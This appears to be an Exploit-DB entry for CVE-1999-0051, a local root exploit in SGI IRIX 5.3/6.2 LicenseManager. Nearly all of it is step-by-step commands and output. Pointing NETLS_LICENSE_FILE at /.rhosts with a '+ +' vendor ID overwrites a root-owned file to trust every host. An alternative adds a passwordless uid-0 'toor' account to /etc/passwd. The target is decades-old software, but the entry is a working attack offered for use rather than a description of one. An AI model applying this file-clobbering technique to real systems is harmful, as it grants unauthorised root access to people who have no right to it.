SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability

ID EDB-ID:19066
Type exploitdb
Reporter Arthur Hagen
Modified 1996-04-05T00:00:00


SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability. CVE-1999-0051. Local exploit for irix platform


Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to
overwrite root-owned files allowing root access.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

NetLS Node-locked
Vendor Name: whatever 
Vendor ID: + + 
Product name: whatever 
License version: 1.000 
License version: 
Expiration date: 01-jan-0 

(in license version field put a space) 


License(s) succesfully installed 

% cat /.rhosts 
#:# "whatever" "whatever" "1.000" "Incomplete" 
+ + 

If your system has remote root logins disabled, replacing /.rhosts with 
/etc/passwd and + + with toor:0:0::/:/bin/sh.